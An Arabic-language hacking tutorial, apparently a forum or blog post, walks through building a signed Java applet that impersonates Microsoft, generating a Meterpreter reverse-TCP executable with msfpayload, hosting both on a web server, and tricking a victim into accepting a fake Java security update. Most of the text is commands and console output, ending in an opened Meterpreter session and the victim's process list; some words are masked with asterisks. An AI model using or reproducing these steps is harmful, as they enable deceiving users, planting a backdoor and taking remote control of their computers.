في البداية يجب أن نحمل جافاroot@bt4:/# apt-get install sun-****6-jdk
نقوم بإنشاء مجلد ونسميه****-appletroot@bt4:/# mkdir ./****-applet
root@bt4:/# cd ./java-applet
t@bt4:/java-applet/# wget http://spl0it.org/files/makeapplet.sh && chmod a+x ./makeapplet.sh
import java.applet.*;
import java.awt.*;
import java.io.*;
public class MSFcmd extends Applet {
public void init() {
Process f;
String first = getParameter("first");
try {
f = Runtime.getRuntime().exec("first");
}
catch(IOException e) {
e.printStackTrace();
}
Process s;
}
}root@bt4:/****-applet/# ./makeapplet.sh
Enter the **** of the applet without the extension: MSFcmd
[+] Packaging the compiled class into a JAR file
[+] Generating key pairs
What is your first and last ****? [Unknown]: MSFcmd
What is the **** of your organizational unit? [Unknown]: Microsoft
What is the **** of your organization? [Unknown]: Microsoft Organization
What is the **** of your City or Locality? [Unknown]: Redmond
What is the **** of your State or Province? [Unknown]: Washington
What is the two-letter country code for this unit? [Unknown]: US
Is CN=MSFcmd, OU=Microsoft, O=Microsoft Organization, L=Redmond, ST=Washington, C=US correct? [no]: yes
[+] Signing the JAR file
Warning:
The signer certificate will expire within six months.
[+] Exporting the public key certificate
Certificate stored in file
[+] Doneroot@bt4:/****-applet/# cp SignedMSFcmd.jar /var/www/
root@bt4:/java-applet/# cp MSFcmd.class /var/www/
root@bt4:/java-applet/# apache2ctl start
root@bt4:/pentest/exploits/framework3/# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 R | ./msfencode -t exe -o my.exe
root@bt4:/pentest/exploits/framework3/# cp ./my.exe /var/www/
root@bt4:/pentest/exploits/framework3/# chmod a+x /var/www/my.exe
الأن سنقوم بعمل صفحة ملقمة بالبكدور مع رسالة جافا لتحديث أمني ونقنع الضحية بالموافقة عليه
تغيير x xx x إلى ip
لتحميل الصفحة الملقمة زيارة إضغط على إسمي punisher77
نقوم الأن بتشغيل ميسبلويت مع الإداة multi/handler وبايلود meterpreter /reverse_tcpmsf > use exploit/multi/handler
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf exploit(handler) > set LPORT 443
LPORT +> 443
msf exploit(handler) > save
Saved configuration to: /root/.msf3/config
msf exploit(handler) >exploit -j[*] Exploit running as background job.[*] Started reverse handler[*] Starting the payload handler
..
بعد الموافقة على التحديث ستفتح sessionsmsf exploit(handler) >[*] Sending stage (718336 bytes)[*] Meterpreter session 1 opened (A.A.A.A:443 -> T.T.T.T:44477)
msf exploit(handler) > sessions -i 1[*] Starting interaction with 1...
meterpreter > ps
Process list
============
PID **** Path
--- ---- ----
204 jusched.exe C:\ProgramFiles\****\jre6\bin\jusched.exe
288 ctfmon.exe C:\WINDOWS\system32\ctfmon.exe
744 smss.exe \SystemRoot\System32\smss.exe
912 winlogon.exe C:\WINDOWS\system32\winlogon.exe
972 services.exe C:\WINDOWS\system32\services.exe
984 lsass.exe C:\WINDOWS\system32\lsass.exe
1176 svchost.exe C:\WINDOWS\system32\svchost.exe
1256 ****.exe C:\Program Files\****\jre6\bin\****.exe
1360 svchost.exe C:\WINDOWS\System32\svchost.exe
1640 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1712 Explorer.EXE C:\WINDOWS\Explorer.EXE
1872 jqs.exe C:\Program Files\****\jre6\bin\jqs.exe
2412 my.exe C:\windows\my.exe
3052 iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
meterpreter >
source
| التوقيع |
| |
Aucun commentaire:
Enregistrer un commentaire